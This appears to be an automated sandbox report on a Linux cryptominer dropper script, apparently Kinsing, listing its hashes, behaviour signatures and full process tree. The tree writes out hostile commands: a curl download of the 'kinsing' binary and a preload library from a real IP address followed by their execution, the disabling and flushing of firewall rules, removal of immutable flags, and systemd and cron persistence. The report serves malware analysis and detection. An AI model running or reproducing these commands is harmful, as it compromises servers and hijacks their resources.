Analysis
-
max time kernel
3s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
06-12-2024 14:06
General
-
Target
script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
-
Size
11KB
-
MD5
07b7746b922cf7d7fa821123a226ed36
-
SHA1
bf2df8f2813ef4e2cf61ea193e091b808aa854c7
-
SHA256
063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1
-
SHA512
ad29993a88c996f96fdc5c01fda89400b1e27228c58445d181dc6af974a171ee36e014d90aa8e09de6d83e4bfd12d167eb361bd52b6d194af6f249a6812019cb
-
SSDEEP
192:Xws08k5tkd5DFPSV3n7/e867jNKvSbRXA8kWmk4lkCIkvUgoaES8DSWOlA+1esP:XQwL4/e867USbRXA8kWT4yCtvUgDjdWi
Score
9/10
Malware Config
Signatures
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Flushes firewall rules 1 TTPs 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 50 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads CPU attributes 1 TTPs 45 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 5 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh1⤵
- Modifies the dynamic linker configuration file
- Modifies systemd
- System Network Configuration Discovery
-
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
-
/sbin/iptables/sbin/iptables -V3⤵
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
- Attempts to change immutable files
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵
-
-
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/idid -u2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -e /dev2⤵
-
-
/bin/lsls -la /etc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep agetty2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 207.38.87.62⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 127.0.0.1:520182⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 34.81.218.76:94862⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 42.112.28.216:94862⤵
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f .main2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ./udp2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/catcat /tmp/.X11-unix/012⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/catcat /tmp/.X11-unix/112⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/catcat /tmp/.X11-unix/222⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/catcat /tmp/.pg_stat.02⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/catcat /tmp/.pg_stat.12⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/catcat /data/./oka.pid2⤵
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ./oka2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep "postgres: autovacum"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -v kinsing2⤵
-
-
/bin/grepgrep -v proxymap2⤵
-
-
/bin/grepgrep -v postgres2⤵
-
-
/bin/grepgrep -v postgrey2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v php-fpm2⤵
-
-
/bin/grepgrep -v "("2⤵
-
-
/bin/grepgrep -v "\\["2⤵
-
-
/bin/grepgrep -v bin2⤵
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v proxymap2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/local/sbin/killkill -9 12323⤵
-
-
/usr/local/bin/killkill -9 12323⤵
-
-
/usr/sbin/killkill -9 12323⤵
-
-
/usr/bin/killkill -9 12323⤵
-
-
/sbin/killkill -9 12323⤵
-
-
/bin/killkill -9 12323⤵
- Reads CPU attributes
-
-
-
/bin/grepgrep -v postgres2⤵
-
-
/bin/grepgrep -v postgrey2⤵
-
-
/bin/grepgrep -v php-fpm2⤵
-
-
/bin/grepgrep -v "("2⤵
-
-
/bin/grepgrep -v "\\["2⤵
-
-
/bin/grepgrep -v bin2⤵
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v postgrey2⤵
-
-
/bin/grepgrep -v postgres2⤵
-
-
/usr/bin/awkawk "{print \$1}"2⤵
-
-
/bin/grepgrep -v php-fpm2⤵
-
-
/bin/grepgrep -v bin2⤵
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵
-
-
/bin/grepgrep -v proxymap2⤵
-
-
/bin/grepgrep -v "("2⤵
-
-
/bin/grepgrep -v "\\["2⤵
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/sscks2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/md5summd5sum /etc/kinsing2⤵
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵
-
-
/bin/chmodchmod 777 /etc/kinsing2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl -o /etc/kinsing http://80.71.158.12/kinsing2⤵
-
-
/bin/chmodchmod +x /etc/kinsing2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵
-
-
/usr/bin/md5summd5sum /etc/kinsing2⤵
-
-
/bin/chmodchmod 777 /etc/kinsing2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl -o /etc/kinsing http://80.71.158.12/kinsing2⤵
-
-
/bin/chmodchmod +x /etc/kinsing2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵
-
-
/usr/bin/md5summd5sum /etc/kinsing2⤵
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵
-
-
/usr/bin/md5summd5sum /etc/libsystem.so2⤵
-
-
/bin/chmodchmod 777 /etc/libsystem.so2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl -o /etc/libsystem.so http://80.71.158.12/libsystem.so2⤵
-
-
/bin/chmodchmod +x /etc/libsystem.so2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵
-
-
/usr/bin/md5summd5sum /etc/libsystem.so2⤵
-
-
/bin/chmodchmod 777 /etc/libsystem.so2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl -o /etc/libsystem.so http://80.71.158.12/libsystem.so2⤵
-
-
/bin/chmodchmod +x /etc/libsystem.so2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵
-
-
/usr/bin/md5summd5sum /etc/libsystem.so2⤵
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵
-
-
/bin/chmodchmod 777 /etc/kinsing2⤵
- File and Directory Permissions Modification
-
-
/bin/chmodchmod +x /etc/kinsing2⤵
- File and Directory Permissions Modification
-
-
/etc/kinsing/etc/kinsing2⤵
-
-
/usr/bin/idid -u2⤵
-
-
/bin/systemctlsystemctl enable bot2⤵
-
-
/bin/systemctlsystemctl start bot2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /base64/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /_cron/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /31.210.20.181/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /update.sh/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /logo4/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /logo9/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /logo0/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /logo/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /tor2web/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /jpg/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /png/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/bin/sedsed /tmp/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/bin/sedsed /zmreplchkr/d2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
